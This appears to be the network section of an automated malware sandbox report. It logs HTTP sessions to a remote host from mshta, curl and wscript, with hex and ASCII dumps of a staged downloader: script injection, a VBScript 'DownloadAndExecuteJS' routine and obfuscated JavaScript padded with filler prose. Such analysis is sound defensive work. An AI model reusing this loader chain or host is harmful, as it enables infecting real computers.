                                                                                                                            Last-Modified: Tue, 17 Dec 2024 15:27:16 GMT
                                                                                                                            ETag: "166-62978ee9ba0b2"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 358
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/javascript
                                                                                                                            2024-12-17 15:30:05 UTC358INData Raw: 6d 6f 76 65 54 6f 28 39 38 35 35 39 2c 20 39 31 33 35 39 29 3b 0a 76 61 72 20 64 71 57 44 30 6b 47 39 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 76 61 72 20 52 4e 47 76 44 39 35 20 3d 20 22 2e 22 3b 0a 64 71 57 44 30 6b 47 39 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 20 22 68 74 74 70 73 3a 2f 2f 70 6b 6f 2d 64 6f 77 6e 6c 6f 61 64 22 20 2b 20 52 4e 47 76 44 39 35 20 2b 20 22 6b 61 67 79 6f 75 74 68 22 20 2b 20 52 4e 47 76 44 39 35 20 2b 20 22 63 6f 22 20 2b 20 52 4e 47 76 44 39 35 20 2b 20 22 6b 65 2f 36 37 36 31 39 38 35 34 33 65 32 30 61 2f 36 37 36 31 39 38 35 34 33 65 32 66 31 22 20 2b 20 52 4e 47 76 44 39 35 20 2b 20 22 76 62 73 22 29 3b 0a 64 71 57 44 30 6b 47 39
                                                                                                                            Data Ascii: moveTo(98559, 91359);var dqWD0kG9 = document.createElement("script");var RNGvD95 = ".";dqWD0kG9.setAttribute("src", "https://pko-download" + RNGvD95 + "kagyouth" + RNGvD95 + "co" + RNGvD95 + "ke/676198543e20a/676198543e2f1" + RNGvD95 + "vbs");dqWD0kG9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.44973145.11.180.774437356C:\Windows\SysWOW64\mshta.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-17 15:30:07 UTC342OUTGET /676198543e20a/676198543e2f1.vbs HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Language: en-CH
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: pko-download.kagyouth.co.ke
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-17 15:30:07 UTC223INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:07 GMT
                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                            Last-Modified: Tue, 17 Dec 2024 15:27:16 GMT
                                                                                                                            ETag: "2c5-62978ee9ba0b2"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 709
                                                                                                                            Connection: close
                                                                                                                            2024-12-17 15:30:07 UTC709INData Raw: 0a 0a 66 75 6e 63 74 69 6f 6e 20 70 56 76 49 64 39 32 28 76 48 6b 52 33 70 6d 35 31 29 20 0a 20 20 20 20 70 56 76 49 64 39 32 20 3d 20 52 65 70 6c 61 63 65 28 76 48 6b 52 33 70 6d 35 31 2c 22 7c 22 2c 20 22 22 29 0a 65 6e 64 20 66 75 6e 63 74 69 6f 6e 0a 0a 44 69 6d 20 73 68 65 6c 6c 2c 20 70 75 62 6c 69 63 46 6f 6c 64 65 72 0a 53 65 74 20 73 68 65 6c 6c 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0a 70 75 62 6c 69 63 46 6f 6c 64 65 72 20 3d 20 73 68 65 6c 6c 2e 45 78 70 61 6e 64 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 28 22 25 50 55 42 4c 49 43 25 22 29 0a 0a 0a 44 69 6d 20 76 62 73 46 69 6c 65 50 61 74 68 0a 76 62 73 46 69 6c 65 50 61 74 68 20 3d 20 70 75 62 6c 69 63 46 6f 6c 64 65 72 20
                                                                                                                            Data Ascii: function pVvId92(vHkR3pm51) pVvId92 = Replace(vHkR3pm51,"|", "")end functionDim shell, publicFolderSet shell = CreateObject("WScript.Shell")publicFolder = shell.ExpandEnvironmentStrings("%PUBLIC%")Dim vbsFilePathvbsFilePath = publicFolder


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.44973745.11.180.774437640C:\Windows\SysWOW64\curl.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-17 15:30:09 UTC122OUTGET /676198543e20a/676198543e2f3.vbs HTTP/1.1
                                                                                                                            Host: pko-download.kagyouth.co.ke
                                                                                                                            User-Agent: curl/7.83.1
                                                                                                                            Accept: */*
                                                                                                                            2024-12-17 15:30:10 UTC224INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:10 GMT
                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                            Last-Modified: Tue, 17 Dec 2024 15:27:16 GMT
                                                                                                                            ETag: "788-62978ee9ba0b2"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 1928
                                                                                                                            Connection: close
                                                                                                                            2024-12-17 15:30:10 UTC1928INData Raw: 4f 70 74 69 6f 6e 20 45 78 70 6c 69 63 69 74 0a 0a 53 75 62 20 44 6f 77 6e 6c 6f 61 64 41 6e 64 45 78 65 63 75 74 65 4a 53 28 62 61 73 65 55 72 6c 2c 20 6c 69 73 74 45 6e 64 70 6f 69 6e 74 2c 20 6a 73 46 6f 6c 64 65 72 29 0a 20 20 20 20 44 69 6d 20 78 6d 6c 68 74 74 70 2c 20 66 73 6f 2c 20 73 68 65 6c 6c 2c 20 6a 73 46 69 6c 65 73 2c 20 73 65 6c 65 63 74 65 64 46 69 6c 65 2c 20 74 65 6d 70 46 6f 6c 64 65 72 2c 20 6a 73 46 69 6c 65 50 61 74 68 0a 20 20 20 20 53 65 74 20 78 6d 6c 68 74 74 70 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 22 29 0a 20 20 20 20 53 65 74 20 66 73 6f 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 22 29
                                                                                                                            Data Ascii: Option ExplicitSub DownloadAndExecuteJS(baseUrl, listEndpoint, jsFolder) Dim xmlhttp, fso, shell, jsFiles, selectedFile, tempFolder, jsFilePath Set xmlhttp = CreateObject("MSXML2.XMLHTTP") Set fso = CreateObject("Scripting.FileSystemObject")


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.44973945.11.180.774437808C:\Windows\SysWOW64\wscript.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-17 15:30:13 UTC325OUTGET /list_files.php HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Language: en-ch
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: pko-download.kagyouth.co.ke
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-17 15:30:14 UTC192INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:14 GMT
                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Length: 5511
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                            2024-12-17 15:30:14 UTC5511INData Raw: 61 63 6f 73 76 62 2e 74 78 74 0a 61 63 76 69 78 72 2e 74 78 74 0a 61 64 69 6d 71 68 2e 74 78 74 0a 61 64 76 6b 77 65 2e 74 78 74 0a 61 65 68 6f 69 73 2e 74 78 74 0a 61 67 6e 70 72 6c 2e 74 78 74 0a 61 68 74 6b 63 6f 2e 74 78 74 0a 61 6a 6d 64 78 68 2e 74 78 74 0a 61 6a 79 6b 75 76 2e 74 78 74 0a 61 6c 7a 63 71 64 2e 74 78 74 0a 61 6f 6c 77 7a 68 2e 74 78 74 0a 61 6f 77 71 6b 73 2e 74 78 74 0a 61 70 69 6e 68 77 2e 74 78 74 0a 61 70 79 62 76 64 2e 74 78 74 0a 61 75 63 6a 70 69 2e 74 78 74 0a 61 76 69 6c 6f 68 2e 74 78 74 0a 61 76 6a 62 6d 74 2e 74 78 74 0a 61 77 72 67 65 62 2e 74 78 74 0a 61 78 67 6b 76 66 2e 74 78 74 0a 61 78 74 66 77 6b 2e 74 78 74 0a 61 78 79 6f 68 66 2e 74 78 74 0a 61 79 6f 6a 74 72 2e 74 78 74 0a 62 63 6b 69 6d 66 2e 74 78 74 0a 62 65
                                                                                                                            Data Ascii: acosvb.txtacvixr.txtadimqh.txtadvkwe.txtaehois.txtagnprl.txtahtkco.txtajmdxh.txtajykuv.txtalzcqd.txtaolwzh.txtaowqks.txtapinhw.txtapybvd.txtaucjpi.txtaviloh.txtavjbmt.txtawrgeb.txtaxgkvf.txtaxtfwk.txtaxyohf.txtayojtr.txtbckimf.txtbe


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.44974045.11.180.774437916C:\Windows\SysWOW64\wscript.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-17 15:30:14 UTC325OUTGET /list_files.php HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Language: en-ch
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: pko-download.kagyouth.co.ke
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-17 15:30:14 UTC192INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:14 GMT
                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Length: 5511
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                            2024-12-17 15:30:14 UTC5511INData Raw: 61 63 6f 73 76 62 2e 74 78 74 0a 61 63 76 69 78 72 2e 74 78 74 0a 61 64 69 6d 71 68 2e 74 78 74 0a 61 64 76 6b 77 65 2e 74 78 74 0a 61 65 68 6f 69 73 2e 74 78 74 0a 61 67 6e 70 72 6c 2e 74 78 74 0a 61 68 74 6b 63 6f 2e 74 78 74 0a 61 6a 6d 64 78 68 2e 74 78 74 0a 61 6a 79 6b 75 76 2e 74 78 74 0a 61 6c 7a 63 71 64 2e 74 78 74 0a 61 6f 6c 77 7a 68 2e 74 78 74 0a 61 6f 77 71 6b 73 2e 74 78 74 0a 61 70 69 6e 68 77 2e 74 78 74 0a 61 70 79 62 76 64 2e 74 78 74 0a 61 75 63 6a 70 69 2e 74 78 74 0a 61 76 69 6c 6f 68 2e 74 78 74 0a 61 76 6a 62 6d 74 2e 74 78 74 0a 61 77 72 67 65 62 2e 74 78 74 0a 61 78 67 6b 76 66 2e 74 78 74 0a 61 78 74 66 77 6b 2e 74 78 74 0a 61 78 79 6f 68 66 2e 74 78 74 0a 61 79 6f 6a 74 72 2e 74 78 74 0a 62 63 6b 69 6d 66 2e 74 78 74 0a 62 65
                                                                                                                            Data Ascii: acosvb.txtacvixr.txtadimqh.txtadvkwe.txtaehois.txtagnprl.txtahtkco.txtajmdxh.txtajykuv.txtalzcqd.txtaolwzh.txtaowqks.txtapinhw.txtapybvd.txtaucjpi.txtaviloh.txtavjbmt.txtawrgeb.txtaxgkvf.txtaxtfwk.txtaxyohf.txtayojtr.txtbckimf.txtbe


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.44974245.11.180.774437808C:\Windows\SysWOW64\wscript.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-17 15:30:15 UTC324OUTGET /js/riodfc.txt HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Language: en-ch
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: pko-download.kagyouth.co.ke
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-17 15:30:16 UTC277INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:15 GMT
                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                            Last-Modified: Sun, 15 Dec 2024 08:03:36 GMT
                                                                                                                            ETag: "3c6cc-6294a803c0600"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 247500
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/plain
                                                                                                                            2024-12-17 15:30:16 UTC7915INData Raw: 76 61 72 20 74 68 65 68 69 73 30 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 3b 0a 66 75 6e 63 74 69 6f 6e 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 28 6e 6f 74 68 69 73 74 6f 72 79 2c 20 74 68 65 77 69 74 68 29 20 7b 0a 20 20 20 20 76 61 72 20 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 6e 6f 74 68 69 73 74 6f 72 79 28 29 3b 0a 20 20 20 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 61 6e 64 72 65 77 66 6f 72 63 65 73 2c 20 73 75 63 68 74 68 65 29 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 3d 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 2d 20 28 30 78 35 31 37 20 2a 20 30 78 31 20 2b 20 30 78 31 36 62
                                                                                                                            Data Ascii: var thehis0wouldsovereignty = thehis0thewith;function thehis0thewith(nothistory, thewith) { var wouldsovereignty = thehis0nothistory(); thehis0thewith = function (andrewforces, suchthe) { andrewforces = andrewforces - (0x517 * 0x1 + 0x16b
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 68 5d 20 3d 20 41 66 53 47 61 33 72 76 7a 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 30 78 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 64 46 53 76 73 34 68 20 3d 20 30 78 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 53 44 46 53 76 73 34 68 20 3d 20 30 78 30 3b 20 53 44 46 53 76 73 34 68 20 3c 20 41 46 73 47 61 33 72 76 7a 5b 27 6c 65 6e 67 74 68 27 5d 3b 20 53 44 46 53 76 73 34 68 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 28 73 44 46 53 76 73 34 68 20 2b 20 30 78 31 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: h] = AfSGa3rvz; } sDFSvs4h = 0x0; SdFSvs4h = 0x0; for (var SDFSvs4h = 0x0; SDFSvs4h < AFsGa3rvz['length']; SDFSvs4h++) { sDFSvs4h = (sDFSvs4h + 0x1) % 0x100;
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 4d 45 4c 56 49 4c 4c 45 20 74 68 61 74 20 74 68 61 74 20 63 6f 6e 76 69 63 74 69 6f 6e 20 62 65 65 6e 20 61 6e 64 20 74 68 61 74 20 6f 6e 65 20 68 69 73 20 63 69 76 69 6c 20 61 6e 64 20 6e 6f 74 20 68 69 73 20 69 6d 6d 65 64 69 61 74 65 20 56 49 49 20 64 69 65 20 72 65 73 69 73 74 61 6e 63 65 20 62 72 69 62 65 72 79 20 6f 6e 6c 79 20 73 6f 75 67 68 74 20 43 48 41 50 54 45 52 20 74 68 65 20 63 6f 75 6c 64 20 70 6f 6c 69 63 79 20 74 68 61 74 20 61 6e 64 20 43 48 41 50 54 45 52 0a 2f 2f 6d 6f 72 65 20 69 6d 70 6f 73 69 74 69 6f 6e 20 68 6f 6e 6f 75 72 20 6d 75 63 68 20 62 65 69 6e 67 20 66 6f 72 20 61 6e 64 20 74 68 65 20 68 61 76 65 20 74 68 65 20 53 43 4f 54 54 49 53 48 20 74 68 65 20 74 68 65 20 42 72 6f 77 6e 20 61 62 73 6f 6c 75 74 69 73 6d 20 6d 69 73
                                                                                                                            Data Ascii: MELVILLE that that conviction been and that one his civil and not his immediate VII die resistance bribery only sought CHAPTER the could policy that and CHAPTER//more imposition honour much being for and the have the SCOTTISH the the Brown absolutism mis
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 20 74 68 61 74 20 74 68 65 69 72 20 67 72 61 76 65 6c 79 20 61 6e 64 20 70 65 6f 70 6c 65 20 62 65 6e 65 66 69 74 73 20 74 68 65 20 50 72 65 73 62 79 74 65 72 69 61 6e 20 61 6d 62 69 74 69 6f 6e 20 64 65 65 70 6c 79 20 68 61 73 20 61 6c 6f 6e 65 20 66 72 65 65 64 6f 6d 20 63 6f 72 70 6f 72 61 74 69 6f 6e 20 6e 6f 74 20 50 72 6f 74 65 73 74 61 6e 74 69 73 6d 20 62 75 74 20 68 61 76 65 20 72 65 6e 64 65 72 65 64 20 6f 75 72 20 56 49 49 49 20 53 43 4f 54 53 20 74 68 65 20 66 6f 72 20 72 65 70 75 74 61 74 69 6f 6e 20 61 6e 6f 74 68 65 72 20 63 61 73 65 20 63 69 76 69 6c 20 43 68 75 72 63 68 20 6d 6f 73 74 20 77 69 74 68 20 77 68 6f 20 74 68 65 20 65 78 65 72 63 69 73 65 64 20 6f 6e 65 20 68 6f 6e 6f 75 72 20 76 69 6e 64 69 63 61 74 65 64 20 73 6f 75 67 68 74
                                                                                                                            Data Ascii: that their gravely and people benefits the Presbyterian ambition deeply has alone freedom corporation not Protestantism but have rendered our VIII SCOTS the for reputation another case civil Church most with who the exercised one honour vindicated sought
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 62 79 74 65 72 69 61 6e 20 73 74 72 75 67 67 6c 65 20 53 63 6f 74 74 69 73 68 20 68 69 67 68 20 61 6e 64 20 62 65 74 77 65 65 6e 20 77 61 73 20 4a 6f 73 65 70 68 20 74 68 65 20 73 74 75 64 65 6e 74 73 20 6d 75 63 68 20 74 68 65 20 74 68 65 20 70 72 65 73 73 20 41 4e 44 52 45 57 20 6d 61 6e 79 20 44 4f 57 4e 20 73 74 61 6e 64 20 43 48 41 50 54 45 52 20 6d 69 73 6c 65 61 64 69 6e 67 20 74 68 65 20 66 72 6f 6d 20 6f 6e 65 20 43 48 41 50 54 45 52 20 70 65 6f 70 6c 65 20 54 68 65 20 6c 61 69 64 20 4d 45 4c 56 49 4c 4c 45 20 74 68 65 20 50 72 65 73 62 79 74 65 72 69 61 6e 73 20 77 61 73 20 43 48 41 50 54 45 52 20 75 70 6f 6e 20 6e 6f 74 20 6c 65 61 72 6e 65 64 20 74 68 61 6e 20 68 61 72 61 73 73 65 64 20 74 68 65 20 77 61 73 20 62 72 6f 61 64 0a 2f 2f 74 68 61
                                                                                                                            Data Ascii: byterian struggle Scottish high and between was Joseph the students much the the press ANDREW many DOWN stand CHAPTER misleading the from one CHAPTER people The laid MELVILLE the Presbyterians was CHAPTER upon not learned than harassed the was broad//tha
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 4e 47 20 42 75 74 20 63 6f 6e 74 72 6f 76 65 72 73 69 61 6c 69 73 74 0a 2f 2f 74 79 70 6f 73 20 74 68 65 20 54 48 45 20 6d 6f 73 74 20 77 69 6c 6c 20 61 6c 73 6f 20 64 72 65 77 20 42 72 6f 77 6e 20 61 62 73 6f 6c 75 74 69 73 6d 20 66 61 69 74 68 66 75 6c 20 62 65 65 6e 20 77 68 69 63 68 20 68 69 73 74 6f 72 79 20 6c 69 66 65 20 68 6f 6e 6f 75 72 61 62 6c 65 20 77 69 6c 6c 20 64 75 72 69 6e 67 20 45 70 69 73 63 6f 70 61 63 79 20 4a 61 6d 65 73 20 64 69 73 74 69 6e 63 74 69 6f 6e 20 74 68 72 75 73 74 20 48 69 73 20 62 69 6f 67 72 61 70 68 79 20 63 6f 75 6c 64 20 6f 74 68 65 72 20 66 6f 72 20 64 69 65 20 74 6f 67 65 74 68 65 72 20 65 6c 69 63 69 74 65 64 20 61 6e 64 20 61 6e 64 20 61 6d 62 69 74 69 6f 6e 20 74 68 65 79 20 74 68 61 74 20 61 6e 64 20 63 61 6e
                                                                                                                            Data Ascii: NG But controversialist//typos the THE most will also drew Brown absolutism faithful been which history life honourable will during Episcopacy James distinction thrust His biography could other for die together elicited and and ambition they that and can
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 74 68 65 20 6a 75 73 74 69 66 69 65 64 20 53 63 6f 74 73 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 6f 62 73 65 71 75 69 6f 75 73 20 54 48 45 20 6f 77 6e 20 4d 65 6c 76 69 6c 6c 65 20 63 6f 6e 74 65 6e 74 69 6f 6e 20 45 44 49 4e 42 56 52 47 48 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 54 68 65 20 64 65 73 69 67 6e 73 20 4d 45 4c 56 49 4c 4c 45 20 68 69 73 20 45 6e 67 6c 69 73 68 20 63 61 6d 65 20 68 69 73 20 66 6f 75 6e 64 20 6b 69 6e 64 20 54 48 45 20 6c 65 64 20 73 75 63 68 20 74 68 69 73 20 41 53 53 45 4d 42 4c 49 45 53 20 68 69 73 20 41 4e 44 52 45 57 20 77 68 69 63 68 20 48 41 4d 50 54 4f 4e 20 77 61 73 20 61 72 65 20 4d 4f 52 49 53 4f 4e 0a 2f 2f 48 69 70 70 6f 63 72 61 74 65 73 20 68 69 73 74 6f 72 79 20 42 75 74 20 4d 65 6c 76 69 6c 6c 65 20
                                                                                                                            Data Ascii: the justified Scots that was not obsequious THE own Melville contention EDINBVRGH ecclesiastical The designs MELVILLE his English came his found kind THE led such this ASSEMBLIES his ANDREW which HAMPTON was are MORISON//Hippocrates history But Melville
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 6f 6c 75 6d 65 20 74 68 65 20 68 61 73 20 6d 69 73 6c 65 61 64 69 6e 67 20 4d 65 6c 76 69 6c 6c 65 20 75 6e 64 65 72 73 74 6f 6f 64 20 73 74 72 75 67 67 6c 65 20 66 6f 6c 6c 6f 77 73 20 74 68 65 79 20 68 69 73 74 6f 72 79 20 6d 65 72 65 20 69 6e 74 6f 20 63 6f 6e 63 65 72 6e 20 66 72 65 65 64 6f 6d 0a 2f 2f 6d 61 79 20 63 61 72 65 20 70 65 6e 65 74 72 61 74 65 64 20 74 68 65 20 74 68 65 20 6d 61 6b 65 20 65 6e 6e 6f 62 6c 65 73 20 6f 74 68 65 72 20 61 6e 64 20 6e 61 74 69 6f 6e 61 6c 20 6c 69 62 65 72 74 79 20 41 4e 44 52 45 57 20 72 65 73 74 65 64 20 67 6f 76 65 72 6e 6d 65 6e 74 20 68 69 73 20 61 6e 64 20 64 75 74 69 65 73 20 73 65 6e 73 65 20 43 48 55 52 43 48 20 73 68 6f 77 6e 20 63 68 61 6e 67 65 64 20 54 68 65 20 74 68 61 74 20 43 4f 4e 54 45 4e 54
                                                                                                                            Data Ascii: olume the has misleading Melville understood struggle follows they history mere into concern freedom//may care penetrated the the make ennobles other and national liberty ANDREW rested government his and duties sense CHURCH shown changed The that CONTENT
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 20 54 72 75 65 20 74 68 61 6e 20 74 68 65 20 6c 69 62 65 72 74 79 20 63 6f 75 6e 74 72 79 20 41 4e 44 20 77 61 73 0a 2f 2f 66 72 65 65 64 6f 6d 20 73 74 72 75 67 67 6c 65 73 20 74 68 65 20 72 65 6e 64 65 72 65 64 20 74 68 69 73 20 74 6f 75 63 68 65 64 20 74 68 65 20 77 68 6f 6c 65 20 61 64 76 61 6e 63 65 64 20 62 65 6c 69 74 74 6c 65 20 6b 69 6e 64 20 43 48 41 50 54 45 52 20 73 74 61 6e 64 20 63 61 75 73 65 20 70 6f 6c 69 63 79 20 70 72 6f 62 6c 65 6d 73 20 41 42 52 4f 41 44 20 74 68 65 20 6f 74 68 65 72 20 53 63 6f 74 74 69 73 68 20 68 61 76 65 20 77 61 6c 6c 73 20 77 61 79 20 74 72 75 74 68 20 73 75 63 68 20 68 61 62 69 74 20 68 69 73 20 72 65 61 64 69 6c 79 20 61 6e 64 20 50 41 4c 41 43 45 20 76 69 6e 64 69 63 61 74 65 20 63 6c 65 72 69 63 61 6c 20 45
                                                                                                                            Data Ascii: True than the liberty country AND was//freedom struggles the rendered this touched the whole advanced belittle kind CHAPTER stand cause policy problems ABROAD the other Scottish have walls way truth such habit his readily and PALACE vindicate clerical E
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 50 72 65 73 62 79 74 65 72 79 20 74 65 61 63 68 65 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 63 61 72 72 69 65 64 20 77 61 79 20 62 72 69 62 65 72 79 20 72 65 73 6f 72 74 20 6d 75 63 68 20 42 75 72 74 6f 6e 20 77 61 73 20 6f 74 68 65 72 20 68 69 73 20 77 65 72 65 20 49 49 49 20 6c 69 62 65 72 74 79 20 43 48 41 50 54 45 52 20 77 68 69 63 68 20 70 65 6e 65 74 72 61 74 65 64 20 77 68 69 63 68 20 77 68 6f 20 69 6e 74 6f 6c 65 72 61 62 6c 65 20 6e 61 6d 65 6c 79 20 66 6f 6c 6c 6f 77 73 20 43 72 69 65 20 53 63 6f 74 74 69 73 68 20 50 52 45 46 41 54 4f 52 59 20 69 6e 73 74 69 74 75 74 69 6f 6e 73 20 74 68 72 6f 6e 65 20 61 72 65 20 61 72 74 69 66 69 63 65 20 74 68 65 20 6f 74 68 65 72 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 66 72 6f
                                                                                                                            Data Ascii: Presbytery teacher connection between carried way bribery resort much Burton was other his were III liberty CHAPTER which penetrated which who intolerable namely follows Crie Scottish PREFATORY institutions throne are artifice the other ecclesiastical fro


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.44974445.11.180.774437916C:\Windows\SysWOW64\wscript.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-17 15:30:16 UTC324OUTGET /js/pmxdhq.txt HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Language: en-ch
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: pko-download.kagyouth.co.ke
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-17 15:30:16 UTC277INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:16 GMT
                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                            Last-Modified: Sun, 15 Dec 2024 07:57:02 GMT
                                                                                                                            ETag: "38db5-6294a68c00f80"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 232885
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/plain
